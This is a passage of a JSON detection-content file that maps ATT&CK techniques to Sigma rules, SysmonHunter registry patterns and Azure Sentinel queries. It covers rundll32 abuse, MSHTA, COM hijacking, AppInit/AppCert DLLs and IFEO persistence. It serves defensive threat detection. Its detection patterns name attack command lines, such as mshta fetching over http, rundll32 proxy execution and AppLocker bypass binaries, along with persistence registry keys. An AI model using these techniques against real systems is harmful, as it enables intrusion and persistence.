Campaign November 2018", + "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "author": "@41thexplorer, Windows Defender ATP", + "status": "stable", + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "references": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/" + ], + "tags": [ + "attack.execution", + "attack.t1085" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "*abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc*" + }, + "condition": "selection" + }, + "level": "high" + }, + { + "action": "global", + "title": "Unidentified Attacker November 2018", + "id": "7453575c-a747-40b9-839b-125a0aae324b", + "status": "stable", + "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", + "references": [ + "https://twitter.com/DrunkBinary/status/1063075530180886529" + ], + "author": "@41thexplorer, Windows Defender ATP", + "date": "2018/11/20", + "modified": "2018/12/11", + "tags": [ + "attack.execution", + "attack.t1085" + ], + "detection": { + "condition": "1 of them" + }, + "level": "high" + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "CommandLine": "*cyzfc.dat, PointFunctionCall" + } + } + }, + { + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection2": { + "EventID": 11, + "TargetFilename": [ + "*ds7002.lnk*" + ] + } + } + }, + { + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth", + "references": [ + "https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100" + ], + "tags": [ + "attack.g0001", + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1085" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Command": [ + "rundll32.exe *,zxFunction*", + "rundll32.exe *,RemoteDiskXXXXX" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + { + "title": "Fireball Archer Install", + "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", + "status": "experimental", + "description": "Detects Archer malware invocation via rundll32", + "author": "Florian Roth", + "date": "2017/06/03", + "references": [ + "https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/", + "https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1085" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "*\\rundll32.exe *,InstallArcherSvc" + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Rundll32 Internet Connection", + "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", + "status": "experimental", + "description": "Detects a rundll32 that communicates with public IP addresses", + "references": [ + "https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100" + ], + "author": "Florian Roth", + "date": "2017/11/04", + "tags": [ + "attack.t1085", + "attack.defense_evasion", + "attack.execution" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 3, + "Image": "*\\rundll32.exe", + "Initiated": "true" + }, + "filter": { + "DestinationIp": [ + "10.*", + "192.168.*", + "172.16.*", + "172.17.*", + "172.18.*", + "172.19.*", + "172.20.*", + "172.21.*", + "172.22.*", + "172.23.*", + "172.24.*", + "172.25.*", + "172.26.*", + "172.27.*", + "172.28.*", + "172.29.*", + "172.30.*", + "172.31.*", + "127.*" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "level": "medium" + }, + { + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", + "status": "experimental", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "author": "Florian Roth", + "date": "2017/04/15", + "references": [ + "https://twitter.com/rikvduijn/status/853251879320662017" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1073", + "attack.t1085", + "car.2013-10-002" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\System32\\control.exe", + "CommandLine": "*\\rundll32.exe *" + }, + "filter": { + "CommandLine": "*Shell32.dll*" + }, + "condition": "selection and not filter" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "Suspicious Rundll32 Activity", + "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", + "description": "Detects suspicious process related to rundll32 based on arguments", + "status": "experimental", + "references": [ + "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", + "https://twitter.com/Hexacorn/status/885258886428725250", + "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1085" + ], + "author": "juju4", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "*\\rundll32.exe* url.dll,*OpenURL *", + "*\\rundll32.exe* url.dll,*OpenURLA *", + "*\\rundll32.exe* url.dll,*FileProtocolHandler *", + "*\\rundll32.exe* zipfldr.dll,*RouteTheCall *", + "*\\rundll32.exe* Shell32.dll,*Control_RunDLL *", + "*\\rundll32.exe javascript:*", + "* url.dll,*OpenURL *", + "* url.dll,*OpenURLA *", + "* url.dll,*FileProtocolHandler *", + "* zipfldr.dll,*RouteTheCall *", + "* Shell32.dll,*Control_RunDLL *", + "* javascript:*", + "*.RegisterXLL*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "level": "medium" + }, + { + "title": "Suspicious Call by Ordinal", + "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "status": "experimental", + "references": [ + "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", + "https://github.com/Neo23x0/DLLRunner", + "https://twitter.com/cyb3rops/status/1186631731543236608" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1085" + ], + "author": "Florian Roth", + "date": "2019/10/22", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "*\\rundll32.exe *,#*" + }, + "condition": "selection" + }, + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows contol panel elements have been identified as source (mmc)" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Binary file metadata" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.justice.gov/file/1080281/download", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://securelist.com/muddywater/88059/" + ] + }, + { + "technique_id": "T1103", + "command_list": [ + "Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs|Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs" + ], + "commands": [ + { + "command": "Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs|Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs", + "source": "SysmonHunter - AppInit DLLs", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "AppInit DLLs", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs|Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (registry_key_path contains \"\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Appinit_Dlls\\\\\"or registry_key_path contains \"\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Appinit_Dlls\\\\\")", + "name": "AppInit DLLs" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Loaded DLLs" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Sysmon ID 7", + "Loaded DLLs" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1122", + "command_list": [ + "\\\\Software\\\\Classes\\\\CLSID\\\\.+\\\\InprocServer32" + ], + "commands": [ + { + "command": "\\\\Software\\\\Classes\\\\CLSID\\\\.+\\\\InprocServer32", + "source": "SysmonHunter - Component Object Model Hijacking", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Component Object Model Hijacking", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\\\Software\\\\Classes\\\\CLSID\\\\.+\\\\InprocServer32", + "flag": "regex" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\\\Software\\\\Classes\\\\CLSID\\\\.+\\\\InprocServer32", + "flag": "regex" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and registry_key_path contains \"\\\\Software\\\\Classes\\\\CLSID\\\\\"", + "name": "Component Object Model Hijacking" + } + ], + "possible_detections": [ + { + "title": "Windows Registry Persistence - COM key linking", + "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", + "status": "experimental", + "description": "Detects COM object hijacking via TreatAs subkey", + "references": [ + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/" + ], + "author": "Kutepov Anton, oscd.community", + "date": "2019/10/23", + "modified": "2019/11/07", + "tags": [ + "attack.persistence", + "attack.t1122" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 12, + "TargetObject|startswith": "HKU\\", + "TargetObject|contains": "_Classes\\CLSID\\", + "TargetObject|endswith": "\\TreatAs" + }, + "condition": "selection" + }, + "falsepositives": [ + "Maybe some system utilities in rare cases use linking keys for backward compability" + ], + "level": "medium" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "DLL monitoring" + ], + [ + "Loaded DLLs" + ], + [ + "LOG-MD", + "Windows Registry", + "Compare" + ], + [ + "LOG-MD", + "Windows Registry", + "Compare" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "Sysmon - ID 7", + "DLL monitoring" + ], + [ + "Sysmon - ID 7", + "Loaded DLLs" + ] + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download" + ] + }, + { + "technique_id": "T1128", + "command_list": [ + "\\SOFTWARE\\Microsoft\\NetSh", + "\\\\Windows\\\\.+\\\\netsh.exeadd|helper" + ], + "commands": [ + { + "command": "\\SOFTWARE\\Microsoft\\NetSh", + "source": "SysmonHunter - Netsh Helper DLL", + "name": "" + }, + { + "command": "\\\\Windows\\\\.+\\\\netsh.exeadd|helper", + "source": "SysmonHunter - Netsh Helper DLL", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Netsh Helper DLL", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\SOFTWARE\\Microsoft\\NetSh" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\netsh.exe" + }, + "cmdline": { + "pattern": "add|helper", + "op": "and" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and registry_key_path contains \"*\\\\SOFTWARE\\\\Microsoft\\\\Netsh\\\\*\"", + "name": "Narsh Helper DLL Registry" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_path contains \"netsh.exe\"and process_command_line contains \"*helper*\")", + "name": "Netsh Helper DLL Process" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "DLL monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1131", + "command_list": [ + "\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Authentication Packages" + ], + "commands": [ + { + "command": "\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Authentication Packages", + "source": "SysmonHunter - Authentication Package", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Authentication Package", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Authentication Packages" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Authentication Packages" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (registry_key_path contains \"*\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\*\")and (process_path !contains \"C:\\\\WINDOWS\\\\system32\\\\lsass.exe\"or process_path !contains \"C:\\\\Windows\\\\system32\\\\svchost.exe\"or process_path !contains \"C:\\\\Windows\\\\system32\\\\services.exe\")", + "name": "Authentication Package" + } + ], + "possible_detections": [ + [ + "4657", + "Windows Registry" + ], + [ + "Loaded DLLs" + ], + [ + "DLL monitoring" + ], + [ + "DLL monitoring" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Sysmon ID 7", + "Loaded DLLs" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1170", + "command_list": [ + "\\\\windows\\\\.+\\\\mshta.exevbscript|javascript|http|https" + ], + "commands": [ + { + "command": "\\\\windows\\\\.+\\\\mshta.exevbscript|javascript|http|https", + "source": "SysmonHunter - Mshta", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Mshta", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\windows\\\\.+\\\\mshta.exe", + "flag": "regex" + }, + "cmdline": { + "pattern": "vbscript|javascript|http|https" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 11 or EventID == 15)and file_name contains \".hta\"", + "name": "MSHTA FileAccess" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3and (process_command_line contains \"mshta.exe\"or process_parent_command_line contains \"mshta.exe\")", + "name": "MSHTA Network" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_command_line contains \"mshta.exe\"or process_parent_command_line contains \"mshta.exe\")", + "name": "MSHTA Process" + } + ], + "possible_detections": [ + { + "title": "Baby Shark Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "experimental", + "description": "Detects activity that could be related to Baby Shark malware", + "references": [ + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.t1086", + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1170" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "author": "Florian Roth", + "date": "2019/02/24", + "detection": { + "selection": { + "CommandLine": [ + "reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"", + "powershell.exe mshta.exe http*", + "cmd.exe /c taskkill /im cmd.exe" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "MSHTA spwaned by SVCHOST as seen in LethalHTA", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "experimental", + "description": "Detects MSHTA.EXE spwaned by SVCHOST described in report", + "references": [ + "https://codewhitesec.blogspot.com/2018/07/lethalhta.html" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1170" + ], + "author": "Markus Neis", + "date": "2018/06/07", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\svchost.exe", + "Image": "*\\mshta.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "MSHTA Spawning Windows Shell", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "status": "experimental", + "description": "Detects a Windows command line executable started from MSHTA.", + "references": [ + "https://www.trustedsec.com/july-2015/malicious-htas/" + ], + "author": "Michael Haag", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\mshta.exe", + "Image": [ + "*\\cmd.exe", + "*\\powershell.exe", + "*\\wscript.exe", + "*\\cscript.exe", + "*\\sh.exe", + "*\\bash.exe", + "*\\reg.exe", + "*\\regsvr32.exe", + "*\\BITSADMIN*" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1170", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" + ], + "falsepositives": [ + "Printer software / driver installations", + "HP software" + ], + "level": "high" + }, + { + "title": "Possible Applocker Bypass", + "id": "82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719", + "description": "Detects execution of executables that can be used to bypass Applocker whitelisting", + "status": "experimental", + "references": [ + "https://github.com/subTee/ApplicationWhitelistBypassTechniques/blob/master/TheList.txt", + "https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/" + ], + "author": "juju4", + "tags": [ + "attack.defense_evasion", + "attack.t1118", + "attack.t1121", + "attack.t1127", + "attack.t1170" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine|contains": [ + "\\msdt.exe", + "\\installutil.exe", + "\\regsvcs.exe", + "\\regasm.exe", + "\\msbuild.exe", + "\\ieexec.exe" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "False positives depend on scripts and administrative tools used in the monitored environment", + "Using installutil to add features for .NET applications (primarly would occur in developer environments)" + ], + "level": "low" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "ID 1 & 7", + "Sysmon" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://securelist.com/muddywater/88059/" + ] + }, + { + "technique_id": "T1180", + "command_list": [ + "Control Panel\\Desktop\\SCRNSAVE.EXE" + ], + "commands": [ + { + "command": "Control Panel\\Desktop\\SCRNSAVE.EXE", + "source": "SysmonHunter - Screensaver", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Screensaver", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "Control Panel\\Desktop\\SCRNSAVE.EXE" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "Control Panel\\Desktop\\SCRNSAVE.EXE" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (registry_key_path contains \"*\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE\")and (process_parent_command_line !contains \"explorer.exe\"or process_path !contains \"rundll32.exe\"or process_command_line !contains \"*shell32.dll,Control_RunDLL desk.cpl,ScreenSaver,*\")", + "name": "Screensaver" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1182", + "command_list": [ + "\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCertDLLs" + ], + "commands": [ + { + "command": "\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCertDLLs", + "source": "SysmonHunter - AppCert DLLs", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "AppCert DLLs", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCertDLLs" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCertDLLs" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and registry_key_path contains \"\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls\\\\\"", + "name": "AppCert DLLs" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Loaded DLLs" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Sysmon ID 7", + "Loaded DLLs" + ] + ], + "external_reference": [ + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/" + ] + }, + { + "technique_id": "T1183", + "command_list": [ + "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\|SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit" + ], + "commands": [ + { + "command": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\|SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit", + "source": "SysmonHunter - Image File Execution Options Injection", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Image File Execution Options Injection", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\|SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\|SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (registry_key_path contains \"\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\\"or registry_key_path contains \"\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\\")", + "name": "Image File Execution Options Injection" + } + ], + "possible_detections": [ + { + "title": "Registry Persistence Mechanisms", + "id": "36803969-5421-41ec-b92f-8500f79c23b0", + "description": "Detects persistence registry keys", + "references": [ + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" + ], + "date": "2018/04/11", + "author": "Karneades", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection_reg1": { + "EventID": 13, + "TargetObject": [ + "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\\\*\\GlobalFlag", + "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\\\*\\ReportingMode", + "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\\\*\\MonitorProcess" + ], + "EventType": "SetValue" + }, + "condition": "selection_reg1" + }, + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.defense_evasion", + "attack.t1183", + "car.2013-01-002" + ], + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Windows event logs" + ], + [ + "LMD - Autoruns" + ], + [ + "4688", + "Process Execution" + ], + [ + "Windows Registry" + ], + [ + "Windows event logs" + ], + [ + "LOG-MD - Autoruns" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html" + ] + }, + { + "technique_id": "T1196", + "command_list": [ + "\\\\Windows\\\\.+\\\\control.exe", + "Shell32.dll,Control_RunDLLAsUser|.cpl" + ], + "commands": [ + { + "command": "\\\\Windows\\\\.+\\\\control.exe", + "source": "SysmonHunter - Control Panel Items", + "name": "" + }, + { + "command": "Shell32.dll,Control_RunDLLAsUser|.cpl", + "source": "SysmonHunter - Control Panel Items", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Control Panel Items", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\control.exe", + "flag": "regex" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "Shell32.dll,Control_RunDLLAsUser|.cpl", + "op": "and" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_command_line contains \"control \\\\/name\"or process_commandline contains \"rundll32 shell32.dll,Control_RunDLL\")", + "name": "Control Panel Items Process" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (registry_key_path contains \"\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\ControlPanel\\\\NameSpace\"or registry_key_path contains \"\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Controls Folder\\\\*\\\\Shellex\\\\PropertySheetHandlers\\\\\"or registry_key_path contains \"\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Control Panel\\\\\")", + "name": "Control Panel Items Registry" + } + ], + "possible_detections": [ + { + "title": "Control Panel Items", + "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "status": "experimental", + "description": "Detects the use of a control panel item (.cpl) outside of the System32 folder", + "reference": [ + "https://attack.mitre.org/techniques/T1196/" + ], + "tags": [ + "attack.execution", + "attack.t1196", + "attack.defense_evasion" + ], + "author": "Kyaw Min Thein", + "date": "2019/08/27", + "level": "critical", + "logsource": { + "product": "windows", + "category": "process_creation" + }, + "detection": { + "selection": { + "CommandLine": "*.cpl" + }, + "filter": { + "CommandLine": [ + "*\\System32\\\\*", + "*%System%*" + ] + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Unknown" + ] + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Windows event logs" + ], + [ + "API monitoring" + ], + [ + "Binary file metadata" + ], + [ + "DLL monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Windows event logs" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "API monitoring" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1223", + "command_list": [ + "\\windows\\hh.exe.chm", + "hh.exe|.chm" + ], + "commands": [ + { + "command": "\\windows\\hh.exe.chm", + "source": "SysmonHunter - Compiled HTML File", + "name": "" + }, + { + "command": "hh.exe|.chm", + "source": "SysmonHunter - Compiled HTML File", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Compiled HTML File", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + 